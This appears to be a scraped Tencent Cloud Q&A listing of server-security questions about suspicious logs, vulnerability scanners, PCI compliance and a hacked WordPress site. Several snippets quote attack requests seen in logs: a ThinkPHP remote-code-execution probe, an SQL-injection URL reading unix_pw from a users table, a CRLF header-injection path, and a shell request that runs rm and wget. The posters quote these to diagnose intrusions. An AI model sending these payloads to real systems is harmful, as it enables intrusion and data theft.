请描述您的问题
标题:2017腾讯云11.11大促 给你实实在在的优惠
地址:https://cloud.tencent.com/act/double11?utm_source=portal&utm_medium=banner&utm_campaign=1111&utm_term=1024
浏览器信息
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
浏览 428提问于2017-11-10
我在AWS上运行了一个spring boot应用程序。我不时看到一个日志,上面写着并提到了ThinkPHP? java.lang.IllegalArgumentException: Invalid character found in the request target [/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21].
The valid characters are defined
浏览 67提问于2020-11-08得票数 5
回答已采纳
2回答
在我的Nginx访问日志中,以下请求(这是其中的一半)都是在几分钟内从注册到越南ISP的IP (我可以提供IP,但我不确定是否允许她)发出的。我昨天刚安装了服务器。注意libwww-perl/5.805用户代理和路径(查找公共配置文件等)。
我应该关注这个问题吗,还是有那么多的机器人在扫描IP,以至于每天都不可避免地得到这样的扫描?
<some IP in Vietnam> - - [22/May/2013:11:15:44 +0000] "GET /db_config.ini HTTP/1.1" 502 166 "-" "libwww-pe
浏览 0提问于2013-05-22得票数 0
回答已采纳
我创建将在Ubuntu20.04VPS服务器上服务的应用程序。Nginx,Python,Postgresql,nodejs,没什么特别的。
不幸的是,我对服务器安全的所有知识都是在ufw启用和fail2ban之后结束的。(因为大多数教程也在它结束后结束。)
你能给我推荐一些关于互联网服务器安全的现代手册吗?如果有一些自动的安全测试服务或任何可以帮助审计/监视服务器的服务--请告诉我,付费是可以的。
浏览 0提问于2022-01-18得票数 1
我在查看apache日志,我觉得有些访问日志看起来很可疑.我不是专业人士,只是把服务器管理作为业余爱好:)所以我不知道是否应该采取一些步骤.
86.138.17.122 - - [20/May/2012:12:53:14 +0200] "\xcb\xaap\xdc\xf9\xba\xec\x0e\x11\xfa\x1d%\x1f\xe9L$\xff\xa6\xe8-\xd2\x11" 501 309 "-" "-"
218.246.22.178 - - [20/May/2012:14:49:22 +0200] "GET /phpMyAd
浏览 0提问于2012-05-27得票数 0
回答已采纳
我有一个建筑:
reportIncludes 运行dotCover来生成覆盖率,并准备和分析任务,以便将覆盖报告上传到SQ.。
该代码已经过时,存在大量静态代码分析问题。我决定通过在队列时间设置SonarQubeExclude = true构建变量来全局地抑制SQ静态代码分析。
问题是SQ分析任务失败了:
##[section]Starting: Run SQ Analysis
==============================================================================
Task : Run Code Analys
浏览 4提问于2021-03-12得票数 0
我正试图在web应用程序中故意打开一个SQL漏洞,看看OpenVAS是否会发现它。
有一个OpenVAS尝试的url,即/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
我有一个简单的NewsPost模型,我已经创建了一个路径,将响应上述网址在我的网络应用程序。
执行的SQL是:SELECT * FROM news_posts WHERE group_id=&limit=50&offset
浏览 0提问于2019-11-21得票数 1
我正在尝试获得一个符合pci标准的网站。
如果你访问(虚拟ip):http:someipaddress/ZNYTMHXO.ashx
然后,用户可以正确地看到我在web配置中声明的页面中的html:
但是,如果您使用相同的url,但在查询字符串中使用?aspxerrorpath=/ : http:someipaddress/ZNYTMHXO.ashx?aspxerrorpath=/
然后,页面在'/‘应用程序中显示一个服务器错误。运行时错误。
pci扫描失败。
为什么这个变量会导致问题?
抱歉,我应该声明ZNYTMHXO.ashx并不存在。404重定向在查询字符串中不存在asperror
浏览 0提问于2013-04-12得票数 1
回答已采纳
随着互联网行业发展,黑客产业链增多。黑客入侵,相对于网络攻击有着更大的破坏力,系统被入侵,信息可能丢失,泄露,应用系统就会毁于一旦。则在这样的情况下,应如何建立有效的安全运维体系?
浏览 1018提问于2018-05-24
题目在题目里。我似乎找不到一个直截了当的答案,泰伯似乎在他们的网站上回避一个“是/否”的答案。几年前,有人告诉我,Qualys是由PCI批准的PCI遵从性,而Nessus当时没有。这一切都变了吗?
浏览 0提问于2016-08-11得票数 0
回答已采纳
我已经有一段时间没有做Elasticsearch + Kibana项目了,但是当我现在使用elasticsearch-head前端时,我注意到添加了多个索引(如下图所示)
如果我向右滚动,我会看到与Logstash相关的文件,比如logstash-2015.06.26。因此,除了这些元素出现之外,一切似乎都是正常的(它们也是众多的)。
当然,我一定是做错了什么事情才会发生这种情况,似乎Logstash正在解析一个不想要的目录的所有文件。我在我的input或filter文件中找不到任何不寻常的地方。
对如何解决这个问题有什么想法吗?
谢谢。
浏览 4提问于2015-10-22得票数 0
回答已采纳
3回答
我们公司将在PCI DSS 3.1下进行SAQ。
我们是否需要付钱给供应商来做现场扫描,或者我们是否可以使用像Nessus这样的东西来自己做扫描?
浏览 0提问于2015-06-16得票数 1
回答已采纳
1回答
我已经在我的网站上运行了一次安全扫描,并在URL下面显示了安全线程的扫描报告,上面写着"HTTP头注入REST样式参数中的漏洞到/catalog/product/view/id“
下面的URL在中添加自定义头XSaint:test/planting-a-stake/category/99。(请参阅响应头中的最后一行)
我尝试了不同的解决方案,但没有运气!有人能建议我防止修改HTTP响应头吗?
网址: /catalog/product/view/id/1256/x%0D%0AXSaint:%20test/planting-a-stake/category/99
响应头:
Cache-Co
浏览 2提问于2017-05-26得票数 0
1回答
有人知道管理Web应用程序安全漏洞的方法吗?我正在寻找一个工具,可以集成硒和或打嗝。我想要一遍又一遍地做测试。在应用程序中,我们需要在应用程序中的某个点来利用某些漏洞。我不确定这样的事情是否存在,但我想我会问。开源会更好。
浏览 0提问于2016-01-07得票数 -2
在哪里或者怎样才能找到一个没有补丁的操作系统的安全漏洞列表呢?我想确定我可以告诉服务器所有者在过时的操作系统上的实际风险。我可以得到所有CVEs的列表,但是我无法筛选补丁状态。
浏览 0提问于2016-06-30得票数 3
回答已采纳
我们当前的对接图像基于Debian 11。在将图像发布到注册表之前,我们使用Trivy漏洞扫描工具。Trivy显示Debian最新图片中有大约100多个高和关键的漏洞,但是对于Ubuntu最新版本,我们没有看到任何高和关键的问题。
从Debian切换到Ubuntu作为我们所有码头形象的基本形象有哪些优点和缺点?“
在所有用户开始使用基于Ubuntu (从Debian切换)的映像时,是否有可能面临兼容性问题?如果是的话,那可能是什么?
浏览 0提问于2023-05-21得票数 0
我在我的网站上使用Wordpress,最近我拦截了一个黑客,他通过很多后门(字面上是成千上万的后门)感染了我的网站。我花了一个半月和他打赌。这不是我的错,在我之前工作的那个人从来没有更新过这个网站。 在这之后,我注意到一些奇怪的访问不存在的文件,我认为黑客试图从我不使用的wordpress插件中寻找已知的漏洞。没关系,我一点也不关心。但其中一次尝试引起了我的注意。 95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http
浏览 60提问于2020-01-18得票数 4
2回答
我在安全测试方面很新。
如果有人能建议使用JSON请求的REST上运行安全问题扫描(E.GSQLInjection)的开源/免费工具,这将是非常有用的。
一些服务也使用OAUTH。
谢谢
浏览 0提问于2016-06-20得票数 3
刚刚完成实名认证,页面下面提示说可以领取免费试用6个月,请问是如何领取,在哪里操作呢?
点立即领取后里面又显示只有15天免费,而且是名额没有了?是我哪里没弄对吗,麻烦相关工作人员帮忙看看,指导一下,谢谢!
image.png
image.png
浏览 690提问于2019-04-28
是否有任何软件或硬件可以在没有付费订阅的情况下执行渗透测试?例如,免费使用,如Kali-linux等。我想学习如何执行渗透测试。如果有任何网站或指南,您的建议,我将不胜感激。
我想在无线路由器和服务器(如Windows、Mac和Linux设备)上进行渗透测试。
有没有可能从安卓,iOS,Linux,黑莓设备上下载?
谢谢。
浏览 0提问于2016-02-28得票数 1
出于好奇,我没有IoT设备,但将进行安全测试;我构建了Nodemcu esp8266服务器。它显示了一个HTML页面(例如,在移动电话上),它允许控制相机模块和A/C继电器并与之交互。例如,我可以显示相机拍摄的图像,我甚至认为它内置了一些图像识别,我可以打开或关闭一个电流继电器(110/220 v A/C电源)。
在我开始五分钟之前,我想,我最好开始思考,一个人能发现和发现哪些类型的漏洞?哪一个邪恶的功绩我可以找到,或者更确切地说,应该能够找到一个适当的五倍的锻炼?(如果我找不到有用的东西,我对物联网中的五极线的方法可能是错误的)
我认为这可能是一个完全没有意义的练习,因为esp8266 ww
浏览 9提问于2021-04-07得票数 0
回答已采纳
5回答
我需要一个很好的Ubuntu漏洞审核工具,所以我决定尝试nmap --我还记得有一种产品可以完成这样的工作-- nessus --它在存储库中不再可用,并且Ubuntu站点http://nessus.org/nessus/上的包已经过时了,我认为最新的版本可能会针对特立独行的人,有人有使用Nessus的经验吗?它与nmap相比如何?
浏览 0提问于2010-11-10得票数 9
回答已采纳
1回答
我有一个开发博客,我看到了14个安全警报,其中一些具有高度严重性、严重严重性和中等严重性。 ? 所以,我运行npm audit来查看问题,它给了我this。 found 1403 vulnerabilities (792 low, 17 moderate, 592 high, 2 critical) in 27197 scanned packages
run `npm audit fix` to fix 1392 of them.
11 vulnerabilities require manual review. See the full report for details
浏览 66提问于2020-05-02得票数 0
我为我拥有的单个EC2实例启用了AWSAmazon检查器(2)。这是一个带有php和apache的ubuntu,没有什么特别之处,状态显示了过去3个小时的扫描。
我看看这台机器的htop,我看到/snap//#/amazon agent正在运行,还有几个/snap//#/ssm-agent-worker正在运行。还是..。三个小时过去了,我没有结果。
它起作用了吗?它不起作用吗?还有更详细的状态吗?另外,如果有人有这方面的经验,你能分享你等待结果的平均时间吗?
浏览 24提问于2022-05-06得票数 0
每个防火墙接口IP是否被视为外部IP?
我们需要扫描每个接口IP吗?
什么是内部扫描?内部的要素是什么,我们是如何做到的?
浏览 0提问于2014-10-29得票数 1
回答已采纳
从我几天以来,我已经注意到,在我的亚特兰蒂斯软件VM (只运行Jira,BitBucket和竹子) PostgreSQL造成了非常高的负载,如htop中所见。
📷
然后我查了一下
SELECT * FROM pg_stat_activity;
在我的系统上运行的是什么,并发现了下面两个奇怪的条目。
12405 | postgres | 15526 | 10 | postgres | | 114.86.94.107 | | 56033 | 2017-11-17 15:40:03.745147+00
浏览 0提问于2017-11-20得票数 1
与手动查找漏洞相比,像w3af这样的工具在查找web应用程序漏洞方面有多有效?他们是否能够从OWASP前10名中找到所有漏洞,如反射xss、持久xss、sqli、lfi/rfi和不受限制的文件上传?还是会有一些漏洞从裂缝中掉下来,而仍未被发现?
浏览 0提问于2014-11-27得票数 3
我刚开始玩OpenVAS虚拟设备。
因此,我为ssh添加了凭据,它将用于访问Cisco路由器:
📷
因此,这将允许OpenVAS登录到用户模式,但它将如何访问启用模式?还是我走错路了?我认为OpenVAS需要启用模式访问来执行某些扫描。
浏览 0提问于2015-10-16得票数 1
Apache错误日志显示以下消息。对我来说好像是一次攻击,但不知道这意味着什么。有谁能告诉我这些攻击是什么,以及如何防止这些攻击造成的任何损害?
[Wed Jan 22 00:39:36 2014] [error] [client x.y.z.a] File does not exist: /var/www/site/webdav
[Wed Jan 22 00:39:36 2014] [error] [client x.y.z.a] File does not exist: /var/www/site/administrator
[Wed Jan 22 00:39:37 2014] [erro
浏览 0提问于2014-01-27得票数 1
2回答
我们使用Snyk作为开源依赖扫描程序。我们目前在每个拉请求上扫描易受攻击的库,这会给我们的开发人员带来开销。什么是好的开源漏洞扫描频率?它应该是每周,双周,每月还是连续?
我试图向我的团队推荐AppSec流程,并希望了解行业实践。如果有一个最佳实践指南,这也会有所帮助。
浏览 0提问于2021-02-08得票数 1
最近,我看到了多个每日404版本的"license.txt“变体,例如”wordpress/Licse.txt“、”blog/Licse.txt“、”old/Licse.txt“、”new/Licse.txt“。下面是经过稍微修改的日志文件的一个小片段来说明:
5.189.164.217 - - [17/Apr/2020:11:12:30 -0700] "GET [redacted]/wordpress/license.txt HTTP/1.1" 404 562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_6
浏览 0提问于2020-04-18得票数 1
回答已采纳
1回答
我知道如何获得存储库,我们可以使用az acr repository list --name myregistry。
但是,在使用azure cli进行安全扫描之后,如何获得具有安全/漏洞问题的标记的存储库呢?
浏览 2提问于2022-09-07得票数 1
我之所以问这个问题,是因为有一个常见的遵从性论点,即执行"OWASP前10位“扫描提供了足够的覆盖率,可以将其视为”深度“扫描。是这种情况,还是各组织正在实施最低程度的扫描覆盖?
浏览 0提问于2020-06-09得票数 2
回答已采纳
我有一个关于安排漏洞扫描和评估工作的问题。
我正在制定漏洞扫描的时间表。我想知道什么时候,为什么要开始扫描,首先-什么条件应该需要这个要求。
是否应该在系统/应用程序设计或配置发生更改时启动此练习?
如果我采用这种方法,我就不得不质疑变化的正确性。这一改变是否得到批准,是否遵循了实施/引入变革的指导方针或最佳方式。
由于不遵守变更管理协议/程序所产生的风险并不是漏洞扫描器的直接责任,因此,如果不通过变更控制系统和其他手段(审计等)来处理这种风险,则该风险并不是直接责任。
当我知道是否遵循了适当的变更管理流程时,我为什么要浪费时间评估风险/测试漏洞,我不需要扫描。
那么,漏洞扫描是否应该由变化或
浏览 0提问于2013-01-23得票数 1
回答已采纳
2回答
在web应用程序的上下文中,漏洞扫描是否是一种形式的模糊?
我被告知情况并非如此,但我知道的是:
Wikipedia将模糊定义为“向计算机程序的输入提供无效、意外或随机的数据”。
Web应用程序漏洞扫描器发送无效的意外数据,以识别SQL注入或跨站点脚本等漏洞。
浏览 0提问于2016-05-29得票数 1
回答已采纳
请描述您的问题
标题:年底大酬宾-腾讯云
地址:https://cloud.tencent.com/act/bargin?utm_source=portal?utm_medium=login&utm_campaign=year-end-promotions&utm_term=1201
浏览器信息
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
浏览 500提问于2017-12-27
1回答
我们公司的一个站点将所有错误的URL重定向回登录页面,这是访问站点所必需的。这不安全吗?我觉得这可能会引起一些奇怪的问题,因为我以前从未见过这种情况,或者至少是一种糟糕的做法。例如,https://www.google.com/fndnandas将重定向到https://www.google.com,而不是像google那样显示404页面。
浏览 0提问于2022-09-27得票数 1
1回答
我的VM扫描器已通过经过身份验证的扫描检测到以下漏洞,请参阅下面。
这是一个由BIGSQL (Dev & Ops )提供的web应用程序。使用此应用程序安全吗?还是可以在没有凭据的情况下利用这些漏洞?如果有人设法获得未经授权的访问web应用程序,那么我可以想象,这些漏洞将是我最不关心的。
📷
浏览 0提问于2017-11-01得票数 0
回答已采纳
我有一个Express.js服务器运行在一个Windows服务器上,在我的测试中,为了将它投入生产,我收到了一个奇怪的调用,据我所知,这是试图访问我的服务器,但我不理解的是,如果这些调用对所有服务器/网页都是正常的话。
我的服务器正在使用Https和Certbot创建的证书一起运行,我已经启用头盔,并禁用了x power-by。我让服务器监听端口443,但我计划将其更改为另一个端口。
在此之前,我接到了许多电话,如下所示:
138.197.190.182 - - [01/Jun/2022:21:00:40 +0000] "HEAD / HTTP/1.0" 404 140
浏览 12提问于2022-07-27得票数 1
回答已采纳
2回答
我被要求在我们的开发过程中集成代码审核工具HP Fortify,但是它的主要限制是不应该每次扫描整个代码:只应该分析受上一个待办事项影响的类。
我们使用Jenkins和SonarQube,所以我看了一下可用的插件,但是找不到符合要求的东西:不要每次都扫描整个代码。
您知道有什么工具或HP配置可以满足我的需要吗?
浏览 0提问于2017-04-18得票数 3
我的主机多个wordpress站点都遇到了安全问题。所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,上周,他们中的一些人受到以下因素的影响:
将流量重定向到显示文件系统中奇怪/损坏文件的垃圾邮件,包括添加到.php文件(编码头)中的额外文件和内容--我们的云提供商发出了滥用警报:一家大银行联系了他们,称我们的IP地址被用来进行钓鱼攻击。服务器在PHP进程(非常高的负载、CPU和内存使用)方面运行得很高。
对此,我有:
一个月前,FilesChecked 从备份中复制了SQL和Wordpress文件,用官方的Wordpress 替换了整
浏览 6提问于2020-04-20得票数 0
非常基本的问题,但我似乎在文档中找不到它。当连续扫描打开时,将以什么频率和何时扫描注册表?我几个小时前就把它打开了,但还没扫描。
浏览 11提问于2021-12-17得票数 0
回答已采纳
2回答
我最近被介绍到OpenVAS,因为我在工作中扫描我们的网络。我对nmap很熟悉,而且我对它的性能很满意,当它从cli中独立使用时,通过iptraf我可以看到它正在以每秒超过1000个数据包的速度进行扫描,但是当通过OpenVAS扫描时,我似乎不能每秒破坏30个数据包,即使nmap首选项设置为扫描25个并发主机,每秒的速率为25包。
我非常希望首先使用nmap进行扫描,然后将结果导入OpenVAS进行进一步的漏洞测试,理想情况下,让OpenVAS只探测nmap报告的开放端口。
我一直在谷歌和谷歌,我没有找到任何明确的说明如何导入结果。海事组织,我认为这将是一个相当标准的特点。
对于如何将grep
浏览 0提问于2013-12-11得票数 2
我有一个EC2实例,它通过OpenSSH在Amazon (CentOS)上运行SFTP。我想运行一些测试来检查我不知道的漏洞,并且我想运行监视软件来监视可疑的行为。有什么可用的/建议?免费是很好的,但支付服务也是可以的。
几个便笺
唯一能够通过SSH连接的用户是ec2-用户,该用户需要使用pem键。
连接该系统的客户必须在EC2's安全组中将他们的IP白名单
sshd_config设置
# SFTP Users
Match Group sftpusers
PasswordAuthentication yes
ChrootDirectory /sftp/%u
Fo
浏览 0提问于2016-10-11得票数 0
回答已采纳
可能重复: 检查常见漏洞的工具?
是否有任何应用程序可以对我的网站进行随机查询,并试图在其中发现漏洞?我特别关心的是sql注入?
浏览 0提问于2011-10-30得票数 0
4回答
我们正在计划一种漏洞管理解决方案,因此我正在寻找诸如Nessus、Qualys和N外地等著名解决方案之间的评估标准。如果有人能分享这样的评价点,那将是非常有帮助的。
浏览 0提问于2016-06-07得票数 2
1回答
nmap可用于检测与其关联的开放端口和服务。此外,我们还可以使用-sV标志来确定服务版本。
是否有任何方法禁用此服务器版本检测?如果黑客知道版本的详细信息,他就可以攻击系统。
例如,在Ubuntu-20.04上,以下是在给定范围内检测服务版本的结果
SHW@system:~$ nmap -sV -p 631 localhost
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-16 18:11 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00022s latency
浏览 0提问于2022-05-16得票数 0
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
